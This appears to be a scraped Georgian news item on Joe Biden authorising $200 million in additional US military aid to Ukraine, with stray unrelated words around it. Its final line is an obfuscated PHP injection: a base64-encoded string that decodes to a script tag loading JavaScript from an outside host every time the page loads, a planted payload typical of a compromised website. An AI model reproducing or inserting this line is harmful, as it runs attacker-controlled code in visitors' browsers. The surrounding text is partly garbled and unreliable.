celsiusi
ავერსი საქკაბელი
შეერთებული შტატების პრეზიდენტმა ჯო ბაიდენმა უკრაინისთვის დამატებით 200 მილიონი აშშ დოლარის სამხედრო დახმარების უფლება გასცა. ინფორმაციას თეთრი სახლი ავრცელებს.
 
დაფინანსება, რომელიც ბაიდენმა საგარეო დახმარების აქტის მეშვეობით გამოყო, შეიძლება გამოყენებულ იქნას იარაღისა და თავდაცვის მასალების შესაძენად აშშ-ს თავდაცვის დეპარტამენტის მარაგიდან, ასევე უკრაინელი ჯარისკაცებისთვის სამხედრო განათლებისა და წვრთნების შესაძლებლობას იძლევა.
 
პაკეტი მოიცავს დაუყოვნებელ დახმარებას, ისეთი სამხედრო აღჭურვილობით, როგორიცაა ჯავშანსაწინააღმდეგო და საზენიტო სისტემები. თეთრმა სახლმა ოფიციალურ კიევს თავდაცვისთვის დამატებით სახსრები მას შემდეგ გამოუყო, რაც შეერთებული შტატების კონგრესმა უკრაინისთვის 13,6 მილიარდი დოლარის ღირებულების გადაუდებელი დახმარება დაამტკიცა.
789
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");